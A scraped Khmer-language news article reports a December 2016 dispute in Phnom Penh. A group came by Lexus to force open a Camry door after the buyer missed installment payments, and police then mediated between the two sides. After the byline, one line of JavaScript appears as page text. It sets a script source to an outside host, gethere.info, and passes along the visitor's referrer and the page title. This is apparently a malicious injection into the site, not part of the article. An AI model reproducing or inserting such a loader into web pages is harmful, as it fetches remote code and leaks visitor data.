Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

បង់ថ្លៃរំលស់រថយន្តមិនទាន់ នាំគ្នាមួយក្រុមជិះLexus មកគាស់ទ្វាររថយន្តដល់មុខផ្ទះ

ភ្នំពេញ៖ រថយន្ដកាម៉ារីឆ្លាមមួយគ្រឿងត្រូវបានមនុស្សមួយក្រុមជិះរយថន្ដលិចស៊ីស មកគាស់ទ្វារថយន្ដ ខណៈដែលម្ចាស់ចតទុកចោលនៅផ្លូវមុខផ្ទះបង្កឲ្យមានការភ្ញាក់ផ្អើលដល់ប្រជាពលរដ្ឋ នឹង សមត្ថកិច្ច។ ហេតុការណ៍នេះបង្ករឲ្យមានការភ្ញាក់ផ្អើលកាលពីវេលាម៉ោងកាលពីវេលាម៉ោង ២ នឹង ៣០ នាទីថ្ងៃទី២២ ខែធ្នូ ឆ្នាំ ២០១៦ ស្ថិតនៅចំណុចផ្លូវបេតុងចូល ក្លឹបឌឹមូន ក្នុងភូមិដំណាក់ធំ សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ។

បើតាមការបញ្ជាក់ពីម្ចាស់រថយន្ដកាម៉ារីឆ្លាមឈ្មោះ មៀច សំរួល ភេទប្រុស អាយុ ៣០ ឆ្នាំស្នាក់នៅកន្លែងកើតហេតុខាងលើបានឲ្យដឹងថាចំពោះរថយន្ដកាម៉ារីឆ្លាមពណ៌ខ្មៅ ពាក់ស្លាកលេខភ្នំពេញ 2C-1053 ជារថយន្ដដែលគាត់បានដោយប្ដូរជាមួយរថយន្ដចាស់របស់គាត់ម៉ាក MONTERO ដោយសន្យាលុយដែលដែលមិនទាន់គ្រប់នឹង បង់ រំលួសជាប្រចាំខែទាល់តែគ្រប់ថ្លៃរថយន្ដកាម៉ារីឆ្លាមនោះ។

ប្រភពដដែលបានបន្ដថាគាត់បានយករថយន្ដរបស់គាត់ពីមុនម៉ាក MONTERO តម្លៃ ២៥០០ដុល្លា ទៅជាមួយរថយន្ដរថយន្ដកាម៉ារីឆ្លាមក្នុងតម្លៃ ៥៧០០ដុល្លា ហើយលុយដែលនៅសល់ទាំងប៉ុន្មានគាត់បានសន្យាថាបង់ជូនជារៀងរាល់ខែ។

ចំណែកបើតាមការបញ្ជាក់ម្ចាស់ឈ្មោះ ផែ សុគន្ធា ភេទស្រី អាយុ ២៣ ជាក្រុមអ្នកជិះរថយន្ដលិចស៊ី ពាក់ស្លាកលេខ ភ្នំពេញ 2U- 2545 ដែលជាអ្នកម្ចាស់រថយន្ដកាម៉ារីឆ្លាមពីមុនបានបញ្ជាក់ប្រាប់ថា មូលហេតុដែលពួកគាត់នាំគ្នា មកគាស់ទ្វារថយន្ដនោះ ព្រោះដោយសារតែអ្នកជិះរថយន្ដកាម៉ារីឆ្លាមឈ្មោះ មៀច សំរួល ភេទប្រុស អាយុ ៣០ ឆ្នាំនេះគាត់បានប្ដូររថយន្ដជាគាត់ហើយបានសន្យាថាបង់រំលួសឲ្យជារៀងរាល់ខែចំនួន ១០០ដុល្លា ចំពោះលុយដែលនៅសល់តែគាត់មិនបានបង់តាមការសន្យានោះទេ ទើបពួកគាត់នាំគ្នាមកគាស់ទ្វាឡានបំរ៉ុងយកទៅវិញ តែលោក មៀច សំរួល មិនព្រម ក៍បង្កឲ្យការភ្ញាក់ដល់ប្រជាពលរដ្ឋ នឹងសមត្ថកិច្ច។

ភ្លាមៗនោះលោក ម៉ៅ សាវឿន នាយប៉ុស្ដិ៍នគរបាលរដ្ឋបាលស្ទឹងមានជ័យបានឲ្យភាគគីទាំងសងខាងយករថយន្ដទាំងពីរមកចរចារគ្នានៅប៉ុស្ដិ៍។

បច្ចុប្បន្នគូរភាគគីទាំងសងខាងកំពុងធ្វើការចរចារណ៍គ្នានៅប៉ុស្ដិ៍នគរបាលរដ្ឋបាលស្ទឹងមានជ័យ។ ដោយ អាត ចន្ធូ

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More